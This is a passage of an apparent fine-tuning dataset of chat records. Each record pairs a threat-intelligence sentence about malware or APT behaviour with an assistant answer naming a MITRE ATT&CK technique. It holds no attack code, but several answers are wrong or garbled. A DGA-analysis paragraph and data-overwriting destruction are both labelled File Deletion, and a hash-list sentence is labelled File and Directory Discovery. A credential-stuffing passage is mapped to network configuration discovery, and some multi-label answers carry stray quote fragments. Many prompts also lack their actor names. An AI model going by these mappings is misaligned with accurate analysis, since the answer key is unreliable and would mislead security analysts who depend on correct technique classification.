"Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QakBot can use \"net share\" to identify network shares for use in lateral movement." }, { "role": "assistant", "content": "T1135 - Network Share Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Fox Kitten has brute forced RDP credentials." }, { "role": "assistant", "content": "T1110 - Brute Force" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PowerShower is a backdoor written in PowerShell." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "InvisiMole has deleted files and directories including XML and files successfully uploaded to C2 servers." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NETWIRE stores its configuration file within the Registry." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A module in collects information from the victim about the current user name." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Operation Wocao has used the Xserver backdoor to exfiltrate data." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has sent malicious Office documents via email as part of spearphishing campaigns as well as executables disguised as documents." }, { "role": "assistant", "content": "T1598.002 - Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has the capability to scan for open ports on hosts in a connected network." }, { "role": "assistant", "content": "T1046 - Network Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TeamTNT has searched for unsecured AWS credentials and Docker API credentials." }, { "role": "assistant", "content": "T1552.001 - Unsecured Credentials: Credentials In Files" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kivars has the ability to conceal its activity through hiding active windows." }, { "role": "assistant", "content": "T1564.003 - Hide Artifacts: Hidden Window" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Molerats decompresses ZIP files once on the victim machine." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Several malware families collect information on the type and version of the victim OS, as well as the victim computer name and CPU information. A Destover-like variant used by also collects disk space information and sends it to its C2 server." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We mentioned earlier that docx files (like xlsx and pptx) are part of the OOXML standard. The document defining this standard[6], describes the syntax and values that can be used as an example. An interesting file to look at is the ‘settings.xml’ file that can be discovered in the ‘Word’ container of the docx zip file. This file contains settings with regards to language, markup and more. First, we extracted all the data from the settings.xml files and started to compare. All the documents below contained the same language values" }, { "role": "assistant", "content": "T1221 - Template Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "To confound detection, its operators recently started using PowerShell scripts that provide direct, in-memory loading and execution of malware executables and libraries. We will also present various payloads, including an RPC-based backdoor and a backdoor leveraging OneDrive as its Command and Control (C&C) server. Then, it calls VirtualProtect to allow writing at the retrieved address. Patching of AmsiScanBuffer function . Payloads . The PowerShell scripts we have presented are generic components used to load various payloads, such as an RPC Backdoor and a PowerShell backdoor. RPC backdoor . Turla has developed a whole set of backdoors relying on the RPC protocol. OneDrive credentials in PowerStallion script . It is interesting to note that Turla operators used the free email provider GMX again, as in the Outlook Backdoor and in LightNeuron. Then it uses a net use command to connect to the network drive. It then checks, in a loop, as shown in Figure 12, if a command is available. Modification of MAC times of the local log file . We believe this backdoor is a recovery access tool in case the main Turla backdoors, such as Carbon or Gazer, are cleaned and operators can no longer access the compromised computers. We have seen operators use this backdoor for the following purposes: Conclusion . In a 2018 blogpost, we predicted that Turla would use more and more generic tools" }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Daserf — This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. T-SMB Scan — This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. Use malware to upload the large list of enumerated files to the C2 server. Select specific files to steal, creating a new list. Use downloaders or other malware to send the new list to a compromised host. Use archiving software to collect files in a password-protected archive. Use an uploader or other malware to send the archived files to an attacker-controlled server. The uploader software is proprietary to this group, but Datper and xxmm also contain an uploading feature. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "collects the endpoint victim's username and uses it as a basis for downloading additional components from the C2 server." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DLL side-loading has been used to execute through a legitimate Citrix executable ssonsvr.exe which is vulnerable to the technique. The Citrix executable was dropped along with by the dropper." }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TrickBot sends the reconnaissance information from the target machine to a hardcoded C2 server. The C2 server is responsible for handling the stolen data" }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Machete has been packed with NSIS." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "collects the OS version, country name, MAC address, computer name, physical memory statistics, and volume information for all drives on the system." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kwampirs uses a large list of C2 servers that it cycles through until a successful connection is established." }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Some samples were signed with a stolen digital certificate." }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The threat used valid accounts against remote services: Cloud-based applications utilizing federated authentication protocols. Our incident responders analysed the credentials used by the adversary and the traces of the intrusion in log files. They uncovered an obvious overlap in the credentials used by this threat and the presence of those same accounts in previously breached databases. Besides that, the traces in log files showed more than usual login attempts with a username formatted as email address, e.g. username>@<email domain>. While usernames for legitimate logins at the victim’s network were generally formatted like <domain>\\<username>. And attempted logins came from a relative small set of IP-addresses" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery', 'T1133 - External Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Poseidon Group conducts credential dumping on victims, with a focus on obtaining credentials belonging to domain and database servers." }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 used different compromised credentials for remote access and to move laterally." }, { "role": "assistant", "content": "T1078 - Valid Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has obfuscated DLLs and functions using dummy API calls inserted between real instructions." }, { "role": "assistant", "content": "T1027.001 - Obfuscated Files or Information: Binary Padding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bumblebee has the ability to perform anti-virtualization checks." }, { "role": "assistant", "content": "T1497 - Virtualization/Sandbox Evasion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PLEAD has the ability to execute shell commands on the compromised host." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ramsay can conduct an initial scan for Microsoft Word documents on the local system, removable media, and connected network drives, before tagging and collecting them. It can continue tagging documents to collect with follow up scans." }, { "role": "assistant", "content": "T1119 - Automated Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT28 has used tools to perform keylogging." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This technique to hijack control flow has also been used by other sophisticated attackers such as FinFisher. Lazarus has also used other novel methods to execute shellcode such as by using the function EnumSystemLocalesA as a callback to shellcode written to executable heap" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information', 'T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chrommme can use Windows API including `WinExec` for execution." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The command handler obtains a command identifier from the C2 server and adds 0xFFFFFF9B to this value and then uses a switch statement to determine the appropriate command to execute" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery', 'T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Zebrocy runs the \"ipconfig /all\" command." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is capable of taking screenshots." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PACT has reverse engineered the DGA, dynamically analyzed the malware, investigated the Threat Actor’s (TA) web-based infrastructure, and consolidated the results of our analysis into the following report" }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The original sample involved in the forbes.com breach used HTTP, which is consistent with the original variant discussed in this blog post. It should be noted that while the newest variant that uses direct network communication over port 22 no longer uses HTTP, references to the HTTP strings are still found within the sample itself. This is most likely due to code re-used by the attackers" }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HOPLIGHT has been observed collecting system time from victim machines." }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GALLIUM used Web shells to persist in victim environments and assist in execution and exfiltration." }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The ROKRAT author implements several techniques typically seen to frustrate human analysts and avoid sandbox execution. First, the malware does not run on Windows XP systems. The code used to perform this task: The malware checks the process names in use on the victim machine. It compares if the executed process name matches a partial name hardcoded in the sample. Here is the complete list" }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Hashes For a list of all hashes of malware encountered during this campaign, please refer to the following file" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A module in Prikormka collects passwords stored in applications installed on the victim." }, { "role": "assistant", "content": "T1555 - Credentials from Password Stores" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "deletes content from C2 communications that was saved to the user's temporary directory." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Most strings in USBStealer are encrypted using 3DES and XOR and reversed." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "(Source: Dell SecureWorks) ChinaChopper web shell — A web-based executable script (see Figure 4) that allows a threat actor to execute commands on the compromised system" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter', 'T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bumblebee can use WMI to gather system information and to spawn processes for code injection." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chimera has used credential stuffing against victim's remote services to obtain valid accounts." }, { "role": "assistant", "content": "T1110.004 - Brute Force: Credential Stuffing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "may save itself as a file named msdtc.exe, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "These credentials are used in a credential stuffing or password spraying attack against the victim’s remote services, such as webmail or other internet reachable mail services. After obtaining a valid account, they use this account to access the victim’s VPN, Citrix or another remote service that allows access to the network of the victim. Information regarding these remotes services is taken from the mailbox, cloud drive, or other cloud resources accessible by the compromised account. As soon as they have a foothold on a system (also known as patient zero or index case), they check the permissions of the account on that system, and attempt to obtain a list of accounts with administrator privileges. With this list of administrator-accounts, the adversary performs another password spraying attack until a valid admin account is compromised. With this valid admin account, a Cobalt Strike beacon is loaded into memory of patient zero. From here on the adversary stops using the victim’s remote service to access the victim’s network, and starts using the Cobalt Strike beacon for remote access and command and control" }, { "role": "assistant", "content": "T1078.002 - Domain Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT28 has performed large-scale scans in an attempt to find vulnerable servers." }, { "role": "assistant", "content": "T1595.002 - Vulnerability Scanning" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mythic supports WebSocket and TCP-based C2 profiles." }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Machete collects stored credentials from several web browsers." }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Flame can create backdoor accounts with login “HelpAssistant” on domain connected systems if appropriate rights are available." }, { "role": "assistant", "content": "T1136.001 - Create Account: Local Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CertPKIProvider.dll, tracked by Microsoft as “VaporRage” can best be described as a shellcode downloader. This version of VaporRage contains 11 export functions including eglGetConfigs, which houses the malicious functionality of the DLL" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ke3chang has used compromised credentials and a .NET tool to dump data from Microsoft Exchange mailboxes." }, { "role": "assistant", "content": "T1114.002 - Email Collection: Remote Email Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "2 contains a \"Destroy\" plug-in that destroys data stored on victim hard drives by overwriting file contents." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FinFisher takes a screenshot of the screen and displays it on top of all other windows for few seconds in an apparent attempt to hide some messages showed by the system during the setup process." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Stage2.exe is a downloader for a malicious file corrupter malware. Upon execution, stage2.exe downloads the next-stage malware hosted on a Discord channel, with the download link hardcoded in the downloader. The next-stage malware can best be described as a malicious file corrupter" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bisonal has added the exfiltrated data to the URL over the C2 channel." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FALLCHILL can search files on a victim." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TSCookie has been executed via malicious links embedded in e-mails spoofing the Ministries of Education, Culture, Sports, Science and Technology of Japan." }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Machete has distributed Machete through a fake blog website." }, { "role": "assistant", "content": "T1189 - Drive-by Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The OsInfo function in collects a running process list." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Micropsia obfuscates the configuration with a custom Base64 and XOR." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PinchDuke transfers files from the compromised host via HTTP or HTTPS to a C2 server." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses VNC to connect into systems." }, { "role": "assistant", "content": "T1021 - Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can launch cmd.exe to execute commands on the system." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SUNSPOT monitored running processes for instances of \"MsBuild.exe\" by hashing the name of each running process and comparing it to the corresponding value \"0x53D525\". It also extracted command-line arguments and individual arguments from the running \"MsBuild.exe\" process to identify the directory path of the Orion software Visual Studio solution." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can be used to dump credentials." }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has detected security tools." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The image and table below illustrate TClient’s encrypted configuration that we decrypted (via Python code): Figure 10" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RCSession can be installed via DLL side-loading." }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Rocke has installed a systemd service script to maintain persistence." }, { "role": "assistant", "content": "T1543.002 - Create or Modify System Process: SysV/Systemd Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN8 has distributed targeted emails containing Word documents with embedded malicious macros." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Remsec can perform DLL injection." }, { "role": "assistant", "content": "T1055.001 - Process Injection: Dynamic-link Library Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KeyBoy has a command to launch a file browser or explorer on the system." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "creates a backdoor through which remote attackers can inject files into running processes." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "If the payload determines it is not running in a sandbox, it will attempt to install itself to the system to persistently execute" }, { "role": "assistant", "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT28 has used tools to take screenshots from victims." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Machete captures audio from the computer’s microphone." }, { "role": "assistant", "content": "T1123 - Audio Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A variant uses a C2 mechanism similar to port knocking that allows attackers to connect to a victim without leaving the connection open for more than a few sectonds." }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WastedLocker can identify network adjacent and accessible drives." }, { "role": "assistant", "content": "T1135 - Network Share Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN7 used the command prompt to launch commands on the victim’s machine." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QakBot can use PowerShell to download and execute payloads." }, { "role": "assistant", "content": 